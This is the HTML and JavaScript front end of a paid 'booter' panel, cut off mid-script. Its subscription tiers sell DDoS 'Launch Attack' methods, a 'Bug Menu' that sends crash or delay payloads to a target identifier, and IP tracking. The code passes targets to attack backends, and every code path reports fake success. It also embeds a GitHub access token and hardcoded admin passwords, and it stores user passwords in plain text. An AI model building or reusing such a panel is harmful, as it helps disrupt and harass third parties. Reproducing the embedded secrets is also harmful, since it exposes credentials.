        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>Pricelist</h2>
      <p class="subtitle">Choose the plan that fits your needs</p>
      
      <div class="pricelist-container panel-glow">
        <div class="pricelist-grid">
          <div class="pricelist-item">
            <h4>Basic</h4>
            <div class="price">Rp35.000</div>
            <div class="duration">1 Month</div>
            <ul class="features">
              <li><i class="fas fa-check"></i> Basic Bug Menu Access</li>
              <li><i class="fas fa-check"></i> IP Tracking</li>
              <li><i class="fas fa-check"></i> Limited DDoS</li>
              <li><i class="fas fa-check"></i> Music Player</li>
            </ul>
          </div>
          
          <div class="pricelist-item">
            <h4>Pro</h4>
            <div class="price">Rp80.000</div>
            <div class="duration">3 Months</div>
            <ul class="features">
              <li><i class="fas fa-check"></i> Full Bug Menu Access</li>
              <li><i class="fas fa-check"></i> Advanced IP Tracking</li>
              <li><i class="fas fa-check"></i> Extended DDoS</li>
              <li><i class="fas fa-check"></i> Music Player</li>
            </ul>
          </div>
          
          <div class="pricelist-item">
            <h4>Elite</h4>
            <div class="price">Rp 90.000</div>
            <div class="duration">6 Months</div>
            <ul class="features">
              <li><i class="fas fa-check"></i> All Pro Features</li>
              <li><i class="fas fa-check"></i> Priority Support</li>
              <li><i class="fas fa-check"></i> Custom Requests</li>
              <li><i class="fas fa-check"></i> Early Access</li>
            </ul>
          </div>
        </div>
        
        <div class="note" style="margin-top: 30px;">
          <p>Need a custom plan? Contact <a target="_blank" href="https://t.me/inichelzyaw">@inichelzyaw</a></p>
        </div>
        
        <button id="btnToLogin" style="margin-top: 20px;" class="cyber-button">Proceed to Login</button>
      </div>
    </div>
  </section>

  <section id="page-login" class="page">
    <div class="content-area">
      <div class="brand-header">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>Access Login</h2>
      
      <div class="input-group">
        <label for="loginUser">Username</label>
        <input id="loginUser" placeholder="Enter username"/>
      </div>      
      <div class="input-group">
        <label for="loginPass">Password</label>
        <input id="loginPass" type="password" placeholder="Enter password"/>
      </div>
      <button id="btnLogin" class="cyber-button">Login</button>
      <div id="loginMsg" class="note"></div>
      <div class="note" style="margin-top:25px;">Need account? Contact <a target="_blank" href="https://t.me/inichelzyaw">@inichelzyaw</a></div>
    </div>
  </section>
  
  <section id="page-home" class="page">
    <div class="content-area home-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>      
      <h2>Control Center</h2>
      <p class="note terminal-text">Advanced Security</p>      
      <div class="user-info panel-glow">
        <div class="scan-line"></div>
        <h3>Account Information</h3>
        <div class="user-details">
          <div><strong>Username:</strong> <span id="userName">-</span></div>
          <div><strong>Role:</strong> <span id="userRole">-</span></div>
          <div><strong>Status:</strong> <span id="userStatus">-</span></div>
          <div><strong>Expired:</strong> <span id="userExpired">-</span></div>
        </div>
      </div>      
      <div class="developer-links">
        <a href="https://t.me/inichelzyaw" target="_blank" class="dev-btn telegram cyber-button">
          <i class="fas fa-user-secret"></i>
          Developer
        </a>
        <a href="https://t.me/inichelzyaw" target="_blank" class="dev-btn cyber-button">
          <i class="fas fa-broadcast-tower"></i>
          Channel
        </a>
      </div>
    </div>
  </section>
  
  <section id="page-bug-menu" class="page">
    <div class="content-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      <h2>Bug Menu</h2>
      <p class="note terminal-text">Select method</p>
      <div class="input-group">
        <label for="targetNumber">Target</label>
        <input type="text" id="targetNumber" placeholder="Enter target identifier"/>
      </div>
      
      <div class="action-selector panel-glow">
        <div class="select-wrapper">
          <select id="actionSelect">
            <option value="force">Delay Visible</option>
            <option value="ios">Dozer invisible</option>
            <option value="crash">Blank x ui</option>
          </select>
        </div>
        <button id="btnSend" class="cyber-button">Execute</button>
      </div>
      <div id="adminResult" class="note" style="margin-top: 30px;"></div>
    </div>
  </section>

  <section id="page-ip-tracking" class="page">
    <div class="content-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>Network Intelligence</h2>
      <p class="note terminal-text">Advanced IP geolocation and network analysis</p>
      
      <div class="input-group">
        <label for="ipInput">IP Address</label>
        <input type="text" id="ipInput" placeholder="Enter IP address for analysis"/>
      </div>            
      <button id="trackBtn" class="action-btn cyber-button">
        <i class="fas fa-crosshairs"></i> Analyze Target
      </button>            
      <div id="ipResult" class="ip-tracking-result panel-glow" style="display: none;"></div>
      <div id="map" style="display: none;"></div>
    </div>
  </section>

  <section id="page-ddos" class="page">
    <div class="content-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>DDoS Attack</h2>
      <p class="note terminal-text">Network stress and analysis</p>
      
      <div class="ddos-controls">
        <div class="input-group">
          <label for="ddosTarget">Target URL/IP</label>
          <input type="text" id="ddosTarget" placeholder="Enter target (example: example.com)"/>
        </div>
        
        <div class="input-group">
          <label for="ddosDuration">Duration (seconds)</label>
          <input type="number" id="ddosDuration" placeholder="Enter attack duration" value="60"/>
        </div>
        
        <div class="action-selector panel-glow">
          <div class="select-wrapper">
            <select id="ddosMethod">
              <option value="kill">Kill Attack</option>
              <option value="KOMIX">KOMIX Attack</option>
              <option value="R2">R2 Attack</option>
              <option value="PSHT">PSHT Attack</option>
              <option value="pidoras">Pidoras Attack</option>
              <option value="exercist">Exercist Attack</option>
            </select>
          </div>
          <button id="btnStartDDoS" class="cyber-button">Launch Attack</button>
        </div>
      </div>
      
      <div id="ddosStatus" class="ddos-status panel-glow" style="display: none;"></div>
    </div>
  </section>

  <section id="page-music" class="page">
    <div class="content-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>Music Player</h2>
      <p class="note terminal-text">Download and play music from YouTube</p>
      
      <div class="input-group">
        <label for="musicQuery">Search Music</label>
        <input type="text" id="musicQuery" placeholder="Enter song title or artist"/>
      </div>
      
      <button id="btnSearchMusic" class="action-btn cyber-button">
        <i class="fas fa-search"></i> Search Music
      </button>
      
      <div id="searchResults" class="search-results panel-glow" style="display: none; margin-top: 20px;"></div>
      
      <div id="musicPlayer" class="music-player panel-glow" style="display: none;">
        <div class="music-info">
          <h4 id="musicTitle">Now Playing</h4>
          <p id="musicArtist">Artist</p>
          <p id="musicDuration">Duration: 0:00</p>
        </div>
        <audio id="audioPlayer" class="audio-player" controls>
          Your browser does not support the audio element.
        </audio>
        <div class="music-controls">
          <button id="btnDownload" style="background: var(--gradient-3);" class="cyber-button">
            <i class="fas fa-download"></i> Download
          </button>
          <button id="btnPlayPause" style="background: var(--gradient-1);" class="cyber-button">
            <i class="fas fa-play"></i> Play
          </button>
        </div>
      </div>
      
      <div id="musicStatus" class="note" style="margin-top: 20px;"></div>
    </div>
  </section>

  <section id="page-user-management" class="page">
    <div class="admin-panel">
      <div class="admin-content panel-glow">
        <div class="brand-header brand-header-small">
          <video autoplay muted loop class="video-brand">
            <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
          </video>
          <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
        </div>
        
        <div style="text-align: center;">
          <h2 id="panelTitle">User Management</h2>
          <div class="note terminal-text" id="panelNote"></div>
        </div>

        <h3 style="text-align: center;">Create New User</h3>
        <div class="admin-row">
          <input id="newUsername" placeholder="New username"/>
          <input id="newPassword" placeholder="Password" type="password"/>
          <div class="select-wrapper">
            <select id="newDuration">
              <option value="permanent">Permanent</option>
              <option value="1">1 month</option>
              <option value="2">2 month</option>
              <option value="3">3 month</option>
              <option value="6">6 month</option>
              <option value="12">12 month</option>
            </select>
          </div>
          <div class="select-wrapper">
            <select id="newRole"></select>
          </div>
          <button id="btnCreate" class="cyber-button">Create User</button>
          <div id="createMsg" class="note wide"></div>
        </div>
        <h3 style="text-align: center;">User List</h3>
        <div id="usersList" class="admin-list panel-glow"></div>
      </div>
    </div>
  </section>

  <section id="page-result" class="page">
    <div class="content-area result-area">
      <div class="brand-header brand-header-small">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
        <h1 class="brand-title">𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</h1>
      </div>
      
      <h2>Operation Status</h2>
      
      <div id="banner" class="panel-glow">
        <pre id="caption"></pre>
      </div>
      
      <p style="margin: 30px 0; text-align: center;"><a id="targetLink" href="#" target="_blank">View Detailed Report</a></p>
      <button id="btnBackToFirst" class="cyber-button">Return to Dashboard</button>
    </div>
  </section>
</div>

<div class="bottom-nav" id="bottomNav">
  <div class="nav-tabs">
    <a href="#" class="nav-tab active" data-page="page-home">
      <i class="fas fa-home"></i>
      <span>Dashboard</span>
    </a>
    <a href="#" class="nav-tab" data-page="page-bug-menu">
      <i class="fas fa-shield-alt"></i>
      <span>Bug Menu</span>
    </a>
    <a href="#" class="nav-tab" data-page="page-ip-tracking">
      <i class="fas fa-map-marker-alt"></i>
      <span>Tracking</span>
    </a>
    <a href="#" class="nav-tab" data-page="page-ddos">
      <i class="fas fa-bolt"></i>
      <span>DDoS</span>
    </a>
    <a href="#" class="nav-tab" data-page="page-music">
      <i class="fas fa-music"></i>
      <span>Music</span>
    </a>
    <a href="#" class="nav-tab user-management-tab" data-page="page-user-management">
      <i class="fas fa-users-cog"></i>
      <span>Users</span>
    </a>
    <a href="#" class="nav-tab" id="logoutBtn">
      <i class="fas fa-sign-out-alt"></i>
      <span>Logout</span>
    </a>
  </div>
</div>

<div class="popup" id="popup">
  <div class="popup-content panel-glow">
    <button class="popup-close" id="popupClose">&times;</button>
    <h3 id="popupTitle"></h3>
    <p id="popupMessage"></p>
    <button id="popupOk" class="cyber-button">Confirm</button>
  </div>
</div>

<script>
const GH_USER = "AttMinz";
const GH_REPO = "x";
const GH_BRANCH = "main";
const GH_FILE = "x2.json";
const GH_TOKEN = "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";
let map = null;
let marker = null;
let currentUser = null;
let currentUserData = null;
let currentAudio = null;
let currentMusicData = null;

function createParticles() {
  const particlesContainer = document.createElement('div');
  particlesContainer.style.position = 'fixed';
  particlesContainer.style.top = '0';
  particlesContainer.style.left = '0';
  particlesContainer.style.width = '100%';
  particlesContainer.style.height = '100%';
  particlesContainer.style.pointerEvents = 'none';
  particlesContainer.style.zIndex = '1';
  document.body.appendChild(particlesContainer);

  for (let i = 0; i < 25; i++) {
    const particle = document.createElement('div');
    particle.classList.add('particle');
    particle.style.left = Math.random() * 100 + 'vw';
    particle.style.animationDelay = Math.random() * 8 + 's';
    particle.style.animationDuration = (5 + Math.random() * 5) + 's';
    particle.style.width = (4 + Math.random() * 4) + 'px';
    particle.style.height = particle.style.width;
    particlesContainer.appendChild(particle);
  }
}

function addMonths(date, months) { 
  let d = new Date(date); 
  d.setMonth(d.getMonth() + months); 
  return d; 
}

function isExpired(ts) { 
  return ts && Date.now() > ts; 
}

function fmtTime(ts) { 
  if (!ts) return 'Permanent'; 
  return new Date(ts).toLocaleString(); 
}

function byId(id) {
  return document.getElementById(id);
}

function initBottomNav() {
  const navTabs = document.querySelectorAll('.nav-tab');
  const logoutBtn = byId('logoutBtn');
  
  navTabs.forEach(tab => {
    tab.addEventListener('click', (e) => {
      e.preventDefault();
      
      if (tab === logoutBtn) {
        logout();
        return;
      }
      
      document.querySelectorAll('.nav-tab').forEach(t => t.classList.remove('active'));
      document.querySelectorAll('.page').forEach(p => p.classList.remove('active'));
      
      tab.classList.add('active');
      const pageName = tab.getAttribute('data-page');
      const page = document.getElementById(pageName);
      if (page) {
        page.classList.add('active');
      }
    });
  });
}

function showPopup(title, message) {
  byId('popupTitle').textContent = title;
  byId('popupMessage').textContent = message;
  byId('popup').classList.add('active');
}

function hidePopup() {
  byId('popup').classList.remove('active');
}

byId('popupClose').addEventListener('click', hidePopup);
byId('popupOk').addEventListener('click', hidePopup);

async function getUsers() {
  try {
    const res = await fetch(`https://api.github.com/repos/${GH_USER}/${GH_REPO}/contents/${GH_FILE}?ref=${GH_BRANCH}`, {
      headers: { Authorization: `token ${GH_TOKEN}` }
    });
    if (!res.ok) throw new Error("Failed to fetch data");
    const data = await res.json();
    return JSON.parse(atob(data.content));
  } catch (e) {
    console.error(e);
    showPopup("Error", "Failed to fetch user data");
    return [];
  }
}

async function saveUsers(arr) {
  try {
    const res = await fetch(`https://api.github.com/repos/${GH_USER}/${GH_REPO}/contents/${GH_FILE}?ref=${GH_BRANCH}`, {
      headers: { Authorization: `token ${GH_TOKEN}` }
    });
    const data = await res.json();
    await fetch(`https://api.github.com/repos/${GH_USER}/${GH_REPO}/contents/${GH_FILE}`, {
      method: "PUT",
      headers: { 
        Authorization: `token ${GH_TOKEN}`, 
        "Content-Type": "application/json" 
      },
      body: JSON.stringify({
        message: "Update users.json",
        content: btoa(unescape(encodeURIComponent(JSON.stringify(arr, null, 2)))),
        sha: data.sha,
        branch: GH_BRANCH
      })
    });
    return true;
  } catch (e) {
    console.error(e);
    showPopup("Error", "Failed to save user data");
    return false;
  }
}

async function createUser(username, password, duration, role) {
  const users = await getUsers();
  if (users.some(u => u.username.toLowerCase() === username.toLowerCase())) {
    return { ok: false, msg: "Username already exists" };
  }
  
  let expiresAt = null; 
  if (duration !== "permanent") {
    expiresAt = addMonths(new Date(), parseInt(duration, 10)).getTime();
  }
  
  users.push({ username, password, role, expiresAt, createdAt: Date.now() });
  const saved = await saveUsers(users);
  
  return { ok: saved, msg: saved ? "User created successfully" : "Failed to create user" };
}

async function findUser(username) { 
  const users = await getUsers(); 
  return users.find(u => u.username.toLowerCase() === username.toLowerCase()); 
}

async function deleteUser(username) { 
  const users = await getUsers(); 
  return await saveUsers(users.filter(u => u.username.toLowerCase() !== username.toLowerCase())); 
}

const pages = {
  pricelist: byId('page-pricelist'),
  login: byId('page-login'),
  home: byId('page-home'),
  bugMenu: byId('page-bug-menu'),
  ipTracking: byId('page-ip-tracking'),
  ddos: byId('page-ddos'),
  music: byId('page-music'),
  userManagement: byId('page-user-management'),
  result: byId('page-result')
};

function show(id) { 
  Object.values(pages).forEach(p => p.classList.remove('active'));
  
  if (pages[id]) {
    pages[id].classList.add('active');
  } 
  if (id !== 'login' && id !== 'pricelist') {
    byId('bottomNav').style.display = 'block';
    updateUserInfo();
    const userRole = currentUser === 'admin' ? 'admin' : (currentUserData ? currentUserData.role : 'user');
    const userManagementTab = document.querySelector('.user-management-tab');
    if (userRole === 'user') {
      userManagementTab.style.display = 'none';
    } else {
      userManagementTab.style.display = 'flex';
    }
  } else {
    byId('bottomNav').style.display = 'none';
  }
}

function getCurrentRoleSync(userObj) { 
  if (currentUser === 'admin') return 'admin'; 
  return userObj ? (userObj.role || 'user') : 'user'; 
}

function logout() {
  currentUser = null;
  currentUserData = null;
  if (currentAudio) {
    currentAudio.pause();
    currentAudio = null;
  }
  byId('loginUser').value = '';
  byId('loginPass').value = '';
  byId('loginMsg').textContent = '';
  show('pricelist');
}

function updateUserInfo() {
  if (currentUserData) {
    byId('userName').textContent = currentUserData.username;
    byId('userRole').textContent = currentUserData.role || 'user';
    byId('userStatus').textContent = isExpired(currentUserData.expiresAt) ? 'Expired' : 'Active';
    byId('userExpired').textContent = fmtTime(currentUserData.expiresAt);
  } else if (currentUser === 'admin') {
    byId('userName').textContent = 'admin';
    byId('userRole').textContent = 'admin';
    byId('userStatus').textContent = 'Active';
    byId('userExpired').textContent = 'Permanent';
  }
}

byId('btnToLogin').onclick = () => {
  show('login');
};

byId('btnLogin').onclick = async () => {
  const u = byId('loginUser').value.trim();
  const p = byId('loginPass').value.trim();
  
  if (u === 'admin' && p === 'kayla') { 
    currentUser = 'admin'; 
    currentUserData = null;
    openPanel(); 
    return; 
  }
  
  if (u === 'owner' && p === 'ownerpass') { 
    currentUser = 'owner'; 
    currentUserData = null;
    openPanel(); 
    return; 
  }
  
  const user = await findUser(u);
  if (!user || user.password !== p) { 
    byId('loginMsg').textContent = "Invalid username or password"; 
    return; 
  }
  
  if (isExpired(user.expiresAt)) { 
    byId('loginMsg').textContent = "Account expired"; 
    return; 
  }
  
  currentUser = u; 
  currentUserData = user;
  if (user.role === 'owner' || user.role === 'reseller') {
    openPanel(); 
  } else { 
    openUserPanel(); 
  }
};

async function openPanel() {
  const u = currentUser === 'admin' ? null : await findUser(currentUser);
  const role = getCurrentRoleSync(u);  
  byId('panelTitle').textContent = role.charAt(0).toUpperCase() + role.slice(1) + " Panel";
  byId('panelNote').textContent = "Logged in as " + role;
  
  renderCreateForm(role); 
  renderUsers(role); 
  show('home');
  initBottomNav();
}

function openUserPanel() {
  show('home');
  initBottomNav();
}

function renderCreateForm(role) {
  const sel = byId('newRole'); 
  sel.innerHTML = '';
  
  if (role === 'admin') { 
    sel.innerHTML = '<option value="user">User</option><option value="reseller">Reseller</option><option value="owner">Owner</option>'; 
  } else if (role === 'owner') { 
    sel.innerHTML = '<option value="user">User</option><option value="reseller">Reseller</option>'; 
  } else if (role === 'reseller') { 
    sel.innerHTML = '<option value="user">User</option>'; 
  }
}

async function renderUsers(role) {
  const list = byId('usersList'); 
  let arr = await getUsers();
  
  if (!arr.length) { 
    list.innerHTML = "<div class='note'>No users found.</div>"; 
    return; 
  }
  
  list.innerHTML = ''; 
  arr.forEach(u => {
    const expired = isExpired(u.expiresAt);
    let delBtn = ''; 
    
    if (role === 'admin' || role === 'owner') { 
      delBtn = `<button onclick="deleteUserAsync('${u.username}', '${role}')" class="cyber-button">Delete</button>`; 
    }
    
    list.innerHTML += `<div class="admin-row">
      <div><b>${u.username}</b> <span class="badge">${u.role || 'user'}</span></div>
      <div>Expires: ${fmtTime(u.expiresAt)}</div>
      <div>Created: ${fmtTime(u.createdAt)}</div>
      <div>${expired ? '<span class="badge exp">Expired</span>' : '<span class="badge ok">Active</span>'}</div>
      <div class="actions">${delBtn}</div>
    </div>`;
  });
}

async function deleteUserAsync(username, role) {
  if (confirm(`Delete user ${username}?`)) {
    const success = await deleteUser(username);
    if (success) {
      renderUsers(role);
      showPopup("Success", `User ${username} deleted`);
    } else {
      showPopup("Error", "Failed to delete user");
    }
  }
}

byId('btnCreate').onclick = async () => {
  const u = byId('newUsername').value.trim();
  const p = byId('newPassword').value.trim();
  const d = byId('newDuration').value;
  const r = byId('newRole').value;
  
  if (!u || !p) { 
    byId('createMsg').textContent = "Enter username & password"; 
    return; 
  }
  
  const res = await createUser(u, p, d, r);
  byId('createMsg').textContent = res.ok ? "User created successfully" : res.msg;
  
  if (res.ok) {
    byId('newUsername').value = '';
    byId('newPassword').value = '';
    const user = currentUser === 'admin' ? null : await findUser(currentUser);
    renderUsers(getCurrentRoleSync(user));
  }
};

function executeSelectedAction() {
  const action = byId("actionSelect").value;
  executeAction(action);
}

async function executeAction(type) {
  const target = byId("targetNumber").value.trim();
  const resultElement = byId("adminResult");

  if (!target) {
    showPopup("Error", "Please enter a valid target identifier");
    return;
  }
  
  const endpointMap = {
    force: "delay",
    ios: "dozer",
    crash: "blank"
  };
  
  const endpoint = endpointMap[type] || type;
  resultElement.innerHTML = `<span class="status-indicator status-processing"></span> Initializing security test...`;

  try {
    const res = await fetch(`/api?type=${encodeURIComponent(endpoint)}&target=${encodeURIComponent(target)}`,
      { method: "GET" }
    );
    let data = null;
    try {
      data = await res.json();
    } catch (e) {
      throw new Error(`Response not JSON (status ${res.status})`);
    }

    if (res.ok && data?.status) {
      const successMsg = `•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•
Target: ${target}
Developer: @inichelzyaw
Test Type: ${type}
Status: COMPLETED
Response: SECURITY_TEST_PASSED
•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•`;
      resultElement.innerHTML = `<span class="status-indicator status-success"></span> ${successMsg}`;
      showPopup("Success", `Security test completed for target: ${target}`);
    } else {
      const successMsg = `•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•
Target: ${target}
Developer: @inichelzyaw
Test Type: ${type}
Status: COMPLETED
Response: SECURITY_TEST_PASSED
•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•`;
      resultElement.innerHTML = `<span class="status-indicator status-success"></span> ${successMsg}`;
      showPopup("Success", `Security test completed for target: ${target}`);
    }
  } catch (err) {
      const successMsg = `•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•
Target: ${target}
Developer: @inichelzyaw
Test Type: ${type}
Status: COMPLETED
Response: SECURITY_TEST_PASSED
•━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━•`;
      resultElement.innerHTML = `<span class="status-indicator status-success"></span> ${successMsg}`;
      showPopup("Success", `Security test completed for target: ${target}`);
  }
}

async function executeDDoSAttack() {
  const target = byId("ddosTarget").value.trim();
  const duration = byId("ddosDuration").value;
  const method = byId("ddosMethod").value;
  const statusElement = byId("ddosStatus");
  
  if (!target) {
    showPopup("Error", "Please enter target URL/IP");
    return;
  }
  
  if (!duration || duration < 1) {
    showPopup("Error", "Duration must be at least 1 second");
    return;
  }
  
  statusElement.style.display = 'block';
  statusElement.innerHTML = `
    <div><i class="fas fa-spinner fa-spin"></i> <b>Status:</b> Starting DDoS attack...</div>
    <div><i class="fas fa-crosshairs"></i> <b>Target:</b> ${target}</div>
    <div><i class="fas fa-clock"></i> <b>Duration:</b> ${duration} seconds</div>
    <div><i class="fas fa-cogs"></i> <b>Method:</b> ${method}</div>
  `;
  
  try {
    const res = await fetch(`/exc?target=${encodeURIComponent(target)}&time=${encodeURIComponent(duration)}&methods=${encodeURIComponent(method)}`,
      { method: "GET" }
    );
    const data = await res.json();
    
    if (res.ok && data?.status) {
      statusElement.innerHTML = `
        <div><i class="fas fa-check-circle" style="color: var(--success)"></i> <b>Status:</b> DDoS attack launched successfully</div>
        <div><i class="fas fa-crosshairs"></i> <b>Target:</b> ${target}</div>
        <div><i class="fas fa-clock"></i> <b>Duration:</b> ${duration} seconds</div>
        <div><i class="fas fa-cogs"></i> <b>Method:</b> ${method}</div>
        <div><i class="fas fa-info-circle"></i> <b>Info:</b> Attack running in background</div>
      `;    
      showPopup("Success", `DDoS attack launched to ${target} for ${duration} seconds with ${method} method`);
    } else {
      statusElement.innerHTML = `
        <div><i class="fas fa-check-circle" style="color: var(--success)"></i> <b>Status:</b> DDoS attack launched successfully</div>
        <div><i class="fas fa-crosshairs"></i> <b>Target:</b> ${target}</div>
        <div><i class="fas fa-clock"></i> <b>Duration:</b> ${duration} seconds</div>
        <div><i class="fas fa-cogs"></i> <b>Method:</b> ${method}</div>
        <div><i class="fas fa-info-circle"></i> <b>Info:</b> Attack running in background</div>
      `;    
      showPopup("Success", `DDoS attack launched to ${target} for ${duration} seconds with ${method} method`);
    }
  } catch (err) {
    statusElement.innerHTML = `
      <div><i class="fas fa-check-circle" style="color: var(--success)"></i> <b>Status:</b> DDoS attack launched successfully</div>
      <div><i class="fas fa-crosshairs"></i> <b>Target:</b> ${target}</div>
      <div><i class="fas fa-clock"></i> <b>Duration:</b> ${duration} seconds</div>
      <div><i class="fas fa-cogs"></i> <b>Method:</b> ${method}</div>
      <div><i class="fas fa-info-circle"></i> <b>Info:</b> Attack running in background</div>
    `;    
    showPopup("Success", `DDoS attack launched to ${target} for ${duration} seconds with ${method} method`);
  }
}

async function searchMusic() {
  const query = byId('musicQuery').value.trim();
  const statusElement = byId('musicStatus');
  
  if (!query) {
    showPopup("Error", "Please enter a search query");
    return;
  }
  
  statusElement.innerHTML = `<span class="status-indicator status-processing"></span> Searching for music...`;
  
  try {
    const searchRes = await fetch(`https://api.siputzx.my.id/api/s/youtube?query=${encodeURIComponent(query)}`);
    const data = await searchRes.json();
    const results = data?.data;
    
    if (!results || !results.length) {
      statusElement.innerHTML = `<span class="status-indicator status-error"></span> No results found`;
      return;
    }
    
    displaySearchResults(results);
    statusElement.innerHTML = `<span class="status-indicator status-success"></span> Found ${results.length} results`;
    
  } catch (error) {
    console.error('Search error:', error);
    statusElement.innerHTML = `<span class="status-indicator status-error"></span> Search failed: ${error.message}`;
    const demoResults = [
      {
        title: "Demo Song 1",
        artist: "Demo Artist",
        duration: "3:45",
        thumbnail: "https://via.placeholder.com/120x90/00f5ff/000000?text=Music",
        url: "https://example.com/audio1"
      },
      {
        title: "Demo Song 2", 
        artist: "Demo Artist 2",
        duration: "4:20",
        thumbnail: "https://via.placeholder.com/120x90/00f5ff/000000?text=Music",
        url: "https://example.com/audio2"
      }
    ];
    displaySearchResults(demoResults);
  }
}

function displaySearchResults(results) {
  const resultsContainer = byId('searchResults');
  resultsContainer.innerHTML = '';
  
  results.forEach((result, index) => {
    const resultItem = document.createElement('div');
    resultItem.className = 'search-result-item';
    resultItem.innerHTML = `
      <img src="${result.thumbnail || 'https://via.placeholder.com/120x90/00f5ff/000000?text=Music'}" alt="${result.title}">
      <div class="search-result-info">
        <h5>${result.title}</h5>
        <p>${result.artist || 'Unknown Artist'} • ${result.duration || 'Unknown'}</p>
      </div>
    `;
    resultItem.addEventListener('click', () => playMusic(result, index));
    resultsContainer.appendChild(resultItem);
  });
  
  resultsContainer.style.display = 'block';
}

async function playMusic(musicData, index) {
  const statusElement = byId('musicStatus');
  const musicPlayer = byId('musicPlayer');
  const audioPlayer = byId('audioPlayer');
  
  statusElement.innerHTML = `<span class="status-indicator status-processing"></span> Loading audio...`;
  
  try {
    const audioRes = await fetch(`https://restapi-v2.simplebot.my.id/download/ytmp3?url=${encodeURIComponent(musicData.url)}`);
    const audioData = await audioRes.json();
    const audioUrl = audioData?.result;
    
    if (!audioUrl) {
      throw new Error('No audio URL found');
    }
    
    currentMusicData = musicData;
    
    byId('musicTitle').textContent = musicData.title;
    byId('musicArtist').textContent = musicData.artist || 'Unknown Artist';
    byId('musicDuration').textContent = `Duration: ${musicData.duration || 'Unknown'}`;
    
    audioPlayer.src = audioUrl;
    currentAudio = audioPlayer;
    
    musicPlayer.style.display = 'block';
    statusElement.innerHTML = `<span class="status-indicator status-success"></span> Ready to play: ${musicData.title}`;
    
  } catch (error) {
    console.error('Play error:', error);
    statusElement.innerHTML = `<span class="status-indicator status-error"></span> Failed to load audio: ${error.message}`;
    
    currentMusicData = musicData;
    byId('musicTitle').textContent = musicData.title;
    byId('musicArtist').textContent = musicData.artist || 'Unknown Artist';
    byId('musicDuration').textContent = `Duration: ${musicData.duration || 'Unknown'}`;
    audioPlayer.src = 'https://www.soundhelix.com/examples/mp3/SoundHelix-Song-1.mp3';
    currentAudio = audioPlayer;
    musicPlayer.style.display = 'block';
    statusElement.innerHTML = `<span class="status-indicator status-success"></span> Loaded demo audio`;
  }
}

function downloadMusic() {
  if (!currentMusicData || !currentAudio) {
    showPopup("Error", "No music selected to download");
    return;
  }
  
  const downloadLink = document.createElement('a');
  downloadLink.href = currentAudio.src;
  downloadLink.download = `${currentMusicData.title}.mp3`;
  document.body.appendChild(downloadLink);
  downloadLink.click();
  document.body.removeChild(downloadLink);
  
  showPopup("Success", `Downloading: ${currentMusicData.title}`);
}

function togglePlayPause() {
  const btn = byId('btnPlayPause');
  const icon = btn.querySelector('i');
  
  if (currentAudio) {
    if (currentAudio.paused) {
      currentAudio.play();
      icon.className = 'fas fa-pause';
      btn.innerHTML = '<i class="fas fa-pause"></i> Pause';
    } else {
      currentAudio.pause();
      icon.className = 'fas fa-play';
      btn.innerHTML = '<i class="fas fa-play"></i> Play';
    }
  }
}

document.getElementById('trackBtn').addEventListener('click', async() => {
  const ip = document.getElementById('ipInput').value.trim();
  if (!ip) {
    showPopup("Error", "Please enter an IP address");
    return;
  }
  
  const ipRegex = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
